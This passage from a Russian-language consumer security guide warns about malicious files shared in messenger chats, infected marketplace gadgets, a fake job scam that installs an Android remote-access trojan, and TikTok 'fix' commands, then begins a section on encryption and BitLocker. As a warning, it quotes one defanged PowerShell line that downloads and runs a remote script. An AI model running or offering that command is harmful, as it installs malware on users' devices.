Актуальные угрозы.
В рабочих и домашних чатах мессенджера «WhatsApp» (Здесь и далее: Сервис, принадлежит организации, деятельность которой запрещена на территории РФ) сейчас часто распространяют вредоносные exe-файлы, замаскированные под красивые картинки или видео, которые пользуются широкой популярностью у пользователей (рис. 16). Иногда расширение файла видно в его названии, и, если там исполняемые или установочные форматы «*.exe» или «*.apk» – ни в коем случае не скачивайте его. Крайне большая вероятность, что это вредоносная программа.
Рисунок 16 – С международным днём кафельной плитки!
Будьте внимательны! На маркетплейсах иногда продают заражённую вирусами технику, – предупреждают эксперты по кибербезопасности. Это относится к любой технике, в том числе к USB-накопителям, роутерам, IP-камерам и другим гаджетам. Особенно настороженно следует относиться к подозрительно дешёвым девайсам. Эксперты говорят, что были случаи, когда дешёвые веб-камеры транслировали всё в интернет втайне от пользователей [8].
Заражённые устройства позволяют собирать информацию, контролировать действия пользователей и использовать устройства как часть ботнетов. Также «заразиться» можно через вредоносные USB-кабели и переходники. Еще одна схожая схема: рассылка «подарочных» флешек с вредоносным ПО или просто их распространение в общественных местах (кто-то ведь точно подберет и вставит в компьютер «флешку», найденную на улице). Достаточно лишь одного подключения заражённого устройства в ваш гаджет, чтобы замысловатый вирус проник к на устройство (но, конечно, так бывает не всегда). Чтобы обезопасить себя от данных угроз [9]:
· Смотреть на рейтинг продавца и читать все отзывы.
· Не покупать товары сильно дешевле рыночной стоимости.
· Не вставлять в свои устройства носители непонятного происхождения.
· Маркировать внешние накопители по уровню доверия фломастером, например «странный продавец» или «официальный продавец».
· Перед использованием отформатировать носитель – относится к «флешкам» и другим внешним накопителям, например твердотельный накопитель SSD или жёсткий диск HDD. Это возможно сделать на любом компьютере с любой операционной системой. Например, на «Windows»: Этот компьютер – правой кнопкой мыши нажмите на подключенный накопитель – Форматировать. На Linux: https://lumpics.ru/formatting-a-flash-drive-in-linux/. На «MacOS»: https://lumpics.ru/how-format-flashdrive-on-macbook/. «Флешка», настроенная на файловую систему «Windows» может не подойти для Linux, для этого нужно смонтировать её: https://losst.pro/montirovanie-fleshki-linux. Вернуть флеш-накопитель для работы с «Windows» https://dzen.ru/a/Y5H56SxxJXiGCkdr.
Будьте бдительны! Мошенники начали притворяться владельцами пункта выдачи заказов (ПВЗ). Легенда такая: «Владельцы ПВЗ» (на самом деле – скамеры) с подставных аккаунтов публикуют на популярных площадках объявления о поиске сотрудников. Жертве предлагают собеседование в мессенджере или через звонок. Ключевой вопрос – каким смартфоном пользуется жертва (преступников интересуют только пользователи «Android»). Потом жертву просят заполнить анкету и направляют ссылку для загрузки приложения якобы для работы. На самом деле это Android-троян удаленного доступа (RAT), который позволяет снять деньги со счетов пользователя. Аналитики «F.A.С.С.T. Digital Risk Protection» установили, что за месяц преступники заработали около 5 млн. рублей, совершив не менее 260 списаний со счетов жертв на среднюю сумму 19 000 рублей. Вот что соискателям рекомендует Мария Синицына, старший аналитик «Digital Risk Protection компании F.A.C.C.T.» (ныне «F6») [10]:
· Владельцы ПВЗ – не маркетплейс, а частные предприниматели. Если вам предлагают работу, обратитесь непосредственно в компанию и уточните, действительно ли там нанимают сотрудников и как происходит трудоустройство.
· Не устанавливайте приложения по ссылкам – легальные приложения и доступы вам предоставят на рабочем месте.
· Перепроверьте присланные ссылки, даже если визуально они похожи на официальные – в доменах мошенников всегда есть ошибки (подмена букв цифрами, лишние символы, а также буквосочетания, похожие на оригинальные – ai => al).
Ещё одна современная угроза. В «TikTok» распространяют видео якобы с помощью для решения популярных проблем пользователей. По типу «Просто введите данную команду в „PowerShell“: iwr hxps://allaio.me/sptfy – UseBascParsng | ix. И ваше устройство больше не будет зависать!» На самом деле данной командой вы установите вредоносную программу на своё устройство. Если в команде есть какие-то ссылки, относитесь к данной рекомендации с настороженностью. Вот хороший ресурс, объясняющий, что делает команда (Linux «Терминал», «Командная строка» и «PowerShell» «Windows»): https://explainshell.com/. Не бойтесь использовать генеративный чат-бот с искусственным интеллектом (ИИ) для объяснения той или иной команды, просто вставьте её и попросите объяснить.
Дополнительно! Нажатие клавиш в тональном режиме во время звонка не может привести к заражению вредоносной программой или списанию денег и т. п.
Дополнительно! Недавно в Ливане сдетонировали пейджеры граждан. Пострадали свыше 2,7 тыс. человек. Эксперты предполагают, что вредоносное ПО могло быть внедрено спецслужбами одного из государств. Они не исключают, что в устройствах могла быть установлена взрывчатка.
Про неоднозначность бытия.
Данная информация скорее будет полезна специалистам по информационной безопасности, но она находится здесь, потому что затрагивает недекларированные возможности (и как следствие, вирусы). Принцип исключительного доверия к отечественным продуктам, начиная от аппаратной части и элементной базы, заканчивая программными продуктами и системами, проверками на соответствие и сертификацией, является официально принятым и разумным, но по факту может быть ошибочным. Например, средство защиты информации (СЗИ), находящееся в реестре российского программного обеспечения (ПО), и в реестре сертифицированных СЗИ ФСТЭК России не подразумевает что система (или программа):
1. Не содержит уязвимостей.
2. Не содержит специально оставленных (созданных) уязвимостей для контроля и нарушения различного рода прав (например, бэкдоры, кейлоггеры и пр.).
3. Является идеальной или удобной.
Вопрос стоит лишь в том, кому доверять свои данные, информацию, доступ, – зарубежным или отечественным корпорациям/спецслужбам. Даже в данном контексте, к сожалению, на данный момент, не во всех случаях выбор отечественной продукции является целесообразным. Но и зарубежные корпорации не идеальны. Данное мнение также является сугубо субъективным, оно может быть ошибочным, поэтому не стоит ему слепо доверять.
1.2.4. Безопасность хранимых данных (криптография)
Виженер однажды сказал: щччъч врньмым хмхмфмъч… юы ыяпмр щд аыыхэзхщ форнъ…
Ключ для расшифровки: Мир
А какие средства и методы безопасности информации были у жителей, например, Российской империи? Это могли быть шторы и шинели, сумки с замками, двери, щеколды, невидимые чернила, легендирование и скрытность, маскировка, охрана, мимика и жесты, а также шифрование… Криптография – одно из самых древних направлений информационной безопасности, наряду со стеганографией. Раньше криптографию считали не только безопасным способом передачи информации, но и целым искусством. Зашифровывать можно хранящиеся или передаваемые данные/информацию, отдельные компьютерные файлы любого формата, папки (директории), целый жёсткий диск, съёмные накопители (в т. ч. флеш). В данном разделе мы будем говорить о зашифровании данных, именно хранящихся на устройстве (потому что зашифрование передаваемых данных и данных в облаке автоматически выполняется за нас), а в других разделах немного затронем и остальные задачи шифрования. Цели шифрования хранимых на устройстве данных зависят от ваших потребностей и далеко не всем оно необходимо: скорее всего рядовому пользователю это не понадобится, но всё же расскажем о такой возможности. Средства для шифрования бывают разные, как системные (встроенные в операционную систему), так и прикладные (которые необходимо скачать и установить), но методы (а точнее математические алгоритмы) шифрования и хеширования с солью (преобразование в необратимый вид) везде стандартные (наиболее современные и лучшие на 2025 г.): ML-KEM, AES, Twofish, SHA3, ECDSA, RSA (чем больше цифра ключа, тем лучше) и сетевые протоколы: HTTPS (TLS), IKEv2, OAuth 2.0 и многие другие.
«BitLocker» и «Encrypting File System».
«Шифрованная файловая система» (EFS) встроена в ОС «Windows» и позволяет легко выполнить зашифрование содержимого выбранных папок или отдельных файлов с помощью функционала системы. К сожалению, она доступна лишь в PRO-версиях «Windows», а также в версиях «Enterprise», «Education», «Server», но не в домашней версии («Home»). Примерно в тех же версиях имеется программа «BitLocker», которая зашифрует не какие-то отдельные объекты, а весь жёсткий диск компьютера (в том числе разные диски, например, внешние подключаемые накопители), а зашифрование происходит по лучшему на данный момент симметричному алгоритму – AES. В настоящее время его почти невозможно взломать, или для этого понадобятся очень большие вычислительные мощности злоумышленника для возможного подбора ключей шифрования, что крайне затруднительно, но ситуация может измениться с появлением «квантовых» компьютеров, работающих на принципах квантовой механики. Правда тогда появятся и подобные же механизмы защиты с такими же мощностями. Симметричные алгоритмы шифрования отличаются от асимметричных своими задачами, у первых важна зашифровка самого сообщения, а у вторых обмен ключами, цифровая подпись, создание безопасного канала коммуникации. Т. е. для создания связи нужны асимметричные алгоритмы, а уже для зашифрования самого сообщения – симметричные (но это совсем грубо сказано). Обычно «BitLocker» можно найти в Панели управления – Система и безопасность – внизу, или вызвать его с помощью контекстного меню, нажав правой кнопкой мыши по вашему диску (обычно OS (C:) в разделе Этот компьютер). При работе с «BitLocker» важно быть внимательным и осторожным, подготовившись заранее, т. к. вы работаете со всем жёстким диском компьютера, иными словами, со всем что у вас есть. Инструкцию по работе с «BitLocker» легко найти в интернете, например, https://remontka.pro/bitlocker-encryption/. Его использование интуитивно просто и понятно, главное записать пароль, чтобы не потерять в будущем всю информацию и доступ к диску. Каждый раз при запуске компьютера нужно будет вводить этот пароль. В качестве «пароля» может быть выбран и другой аутентификатор, например, USB-флеш накопитель. Если случилось так, что вы потеряли (забыли) пароль, скорее всего, восстановить данные не получится, но вот переустановить операционную систему и заново пользоваться компьютером конечно же возможно.